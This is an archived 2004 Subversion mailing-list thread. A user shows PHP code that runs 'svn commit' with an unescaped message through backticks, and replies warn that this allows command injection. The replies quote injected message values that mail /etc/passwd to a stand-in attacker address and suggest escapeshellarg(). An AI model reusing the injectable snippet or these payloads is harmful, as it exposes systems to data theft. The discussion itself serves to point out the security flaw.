You are viewing a plain text version of this content. The canonical link for it is here.
Posted to users@subversion.apache.org by "Simmons, Bryan" <bs...@gpworldwide.com> on 2004/02/11 20:58:15 UTC
PHP hack under way
Ok, so I went ahead and took the easiest approach I could: svn client
commands in php.
The kinks have not all been worked out for my php portal but I did find
a way to successfully
push revisions to subversion through php.
I use the backtick operator. Yep, it's that simple.
$response = `svn commit -m \"$message\"`;
I have found that the $response is dead-on accurate in this case despite
warnings that the
command line response may be garbled into binary.
Here's a question: will svn add && svn commit work?
Regards,
Bryan Simmons
Network Systems Engineer
General Physics
410.379.3710
bsimmons@genphysics.com
---------------------------------------------------------------------
To unsubscribe, e-mail: users-unsubscribe@subversion.tigris.org
For additional commands, e-mail: users-help@subversion.tigris.org
Re: PHP hack under way
Posted by Ben Collins-Sussman <su...@collab.net>.
On Wed, 2004-02-11 at 14:58, Simmons, Bryan wrote:
> I use the backtick operator. Yep, it's that simple.
>
> $response = `svn commit -m \"$message\"`;
>
By the way, I hear rumors that SWIG can produce real PHP bindings the
Subversion C API. People are already using SWIG to produce python,
perl, and java bindings. That might be a better long-term approach.
---------------------------------------------------------------------
To unsubscribe, e-mail: users-unsubscribe@subversion.tigris.org
For additional commands, e-mail: users-help@subversion.tigris.org
Re: PHP hack under way
Posted by Florian Weimer <fw...@deneb.enyo.de>.
Brian W. Fitzpatrick wrote:
> > $response = `svn commit -m \"$message\"`;
> I don't know offhand, but I suspect that you may be opening up a
> security hole the size of Texas by doing this. What if message is
> actually equal to
>
> "foo\" ; mail evilhaxor@example.com < /etc/passwd"
>
> or something worse.
With magic_quotes_gpc, this doesn't work, but
$(mail evilhaxor@example.com < /etc/passwd)
probably does...
You could use escapeshellarg() and similar functions to preprocess the
argument, but I don't understand the C source code and still have an
uneasy feeling about them.
---------------------------------------------------------------------
To unsubscribe, e-mail: users-unsubscribe@subversion.tigris.org
For additional commands, e-mail: users-help@subversion.tigris.org
Re: PHP hack under way
Posted by "Brian W. Fitzpatrick" <fi...@red-bean.com>.
On Wed, 2004-02-11 at 14:58, Simmons, Bryan wrote:
> Ok, so I went ahead and took the easiest approach I could: svn client
> commands in php.
> The kinks have not all been worked out for my php portal but I did find
> a way to successfully
> push revisions to subversion through php.
>
> I use the backtick operator. Yep, it's that simple.
>
> $response = `svn commit -m \"$message\"`;
>
> I have found that the $response is dead-on accurate in this case despite
> warnings that the
> command line response may be garbled into binary.
>
> Here's a question: will svn add && svn commit work?
I don't know offhand, but I suspect that you may be opening up a
security hole the size of Texas by doing this. What if message is
actually equal to
"foo\" ; mail evilhaxor@example.com < /etc/passwd"
or something worse.
Just a little something to think about.
-Fitz
---------------------------------------------------------------------
To unsubscribe, e-mail: users-unsubscribe@subversion.tigris.org
For additional commands, e-mail: users-help@subversion.tigris.org